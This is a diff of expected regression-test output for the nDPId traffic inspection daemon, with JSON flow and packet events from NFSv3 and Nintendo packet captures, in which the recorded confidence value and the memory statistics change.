00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":944207397400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":944207397400,"pkt":"AMCV+E3TAMCV4Bm+CABFAACcZUEAAP8RE3WLGRYCixkWZgP+CAEAiHeHXh0L3AAAAAAAAAACAAGGowAAAAMAAAABAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAgABAQhQAAA+cACgAAAACyWgAAACkACgAAAACyWgAAACk="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397400,"flow_last_seen":944207397400,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":944207397400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397400,"flow_last_seen":944207397400,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":944207397400,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":944207397400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":944207397400,"pkt":"AMCV4Bm+AMCV+E3TCABFAACM5FMAAP8RlHKLGRZmixkWAggBA\/4AeFlmXh0L3AAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAEHtAAAAAgAAAAAAAAABAAAAAAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEIUAAAAAAACyWjhHdgwUQ\/0COEd16jDgNQI4R3XqMOA1Ag=="} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":944207397400,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":944207397400,"pkt":"AMCV+E3TAMCV4Bm+CABFAACcZUIAAP8RE3SLGRYCixkWZgP+CAEAiHd0Xh0L3QAAAAAAAAACAAGGowAAAAMAAAATAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAgABAQhQAAA+cACgAAAACyWgAAACkACgAAAACyWgAAACk="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397740,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":944207397740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":944207397740,"pkt":"AMCV+E3TAMCV4Bm+CABFAABcZXwAAEAR0nqLGRYCixkWZgzjAG8ASDjzOExLeQAAAAAAAAACAAGGoAAAAAMAAAADAAAAAAAAAAAAAAAAAAAAAAABhqUAAAABAAAAA3VkcAAAAAAAAAAAAA=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397740,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":944207397740,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":944207397740,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":944207397740,"pkt":"AMCV4Bm+AMCV+E3TCABFAABM5PUAAEARUxGLGRZmixkWAgBvDOMAOGUBOExLeQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAEjEzOS4yNS4yMi4xMDIuNC4yNAAA"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00588{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":944207397750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":158,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":158,"pkt_l4_len":124,"thread_ts_msec":944207397750,"pkt":"AMCV+E3TAMCV4Bm+CABFAACQZX4AAEAR0kSLGRYCixkWZgLSBBgAfLyvOExziQAAAAAAAAACAAGGpQAAAAEAAAADAAAAAQAAADQ4R3YLAAAACXdlcnJtc2NoZQAAAAAAAAAAAAABAAAABQAAAAEAAAAAAAAAAgAAAAMAAAARAAAAAAAAAAAAAAAUL2hvbWUvZ2lybGljaC9leHBvcnQ="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":116,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":944207397750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":944207397750,"pkt":"AMCV4Bm+AMCV+E3TCABFAAA05PgAAEARUyaLGRZmixkWAgQYAtIAIApTOExziQAAAAEAAAAAAAAAAAAAAAAAAAAA"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397310,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":944207397400,"flow_last_seen":944207397690,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":16648,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397330,"flow_last_seen":944207397330,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3298,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397280,"flow_last_seen":944207397280,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3295,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397320,"flow_last_seen":944207397320,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3297,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397740,"flow_last_seen":944207397740,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3299,"dst_port":111,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397310,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":706,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397750,"flow_last_seen":944207397750,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":722,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":944207397290,"flow_last_seen":944207397290,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":3296,"dst_port":1048,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":944207397400,"flow_last_seen":944207397690,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":16648,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":944207397750,"l3_proto":"ip4","src_ip":"139.25.22.2","dst_ip":"139.25.22.102","src_port":1022,"dst_port":2049,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NFS","breed":"Acceptable","category":"DataTransfer"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":128,"source":"nfsv3.pcap","alias":"nDPId-test","packets-captured":128,"packets-processed":128,"total-skipped-flows":0,"total-l4-payload-len":17440,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":944207397750} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 128/128 @@ -50,9 +50,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880575 bytes -~~ total memory freed........: 5880575 bytes -~~ total allocations/frees...: 118270/118270 +~~ total memory allocated....: 6014209 bytes +~~ total memory freed........: 6014209 bytes +~~ total allocations/frees...: 121032/121032 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 814 chars diff --git a/test/results/nintendo.pcap.out b/test/results/nintendo.pcap.out index c3051f5e6..faea05063 100644 --- a/test/results/nintendo.pcap.out +++ b/test/results/nintendo.pcap.out @@ -2,14 +2,14 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1500731320644} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1500731320644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320644,"pkt":"AA6OGXEMfLuKifuECABFAABYEUEAAEARTg7AqAxyWwjzI8uXwRgARM2+MquYZAJWA8uWATPgxkj4NJP7aMnpzfBBRQUJGYsmvR+Tfti6\/9NW0mVVtdYfmAlO0lOZx8+qpE3Q9Qrr"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731320644,"flow_last_seen":1500731320644,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1500731320644,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1500731320732,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1500731320732,"pkt":"fLuKifuEAA6OGXEMCABFAABY97kAADIRdZVbCPMjwKgMcsEYy5cARD+fMquYZAJwBDs0OpYMdoXMEb7z5ADj1gGyYiTWHIsmvR+Tfti6\/9NW0mVVtdYcxe3DWV6ogDbeCRSMhnlF"} 